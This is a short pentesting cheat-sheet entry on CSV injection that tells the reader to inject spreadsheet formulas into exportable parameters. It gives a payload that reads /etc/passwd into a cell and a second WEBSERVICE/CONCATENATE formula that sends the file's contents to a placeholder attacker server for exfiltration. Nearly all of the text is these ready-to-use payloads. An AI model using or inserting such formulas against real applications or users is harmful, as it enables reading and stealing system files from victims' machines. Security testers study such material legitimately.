CSV Injection

If we find some parameters in which the input data can be exported in a CSV file, we could try CSV Injection.

First, in all the parameters inject the following:

='file:///etc/passwd'#$passwd.A1

Export the CSV and see if /etc/passwords contens are listed in any of the fields.

Using the following payload, the contents of the file in the victim system could be sent to a malicious server for exfiltration:

=WEBSERVICE(CONCATENATE("http://[ATTACKER_SERVER]:[PORT]/",('file:///etc/passwd'#$passwd.A1)))

Last updated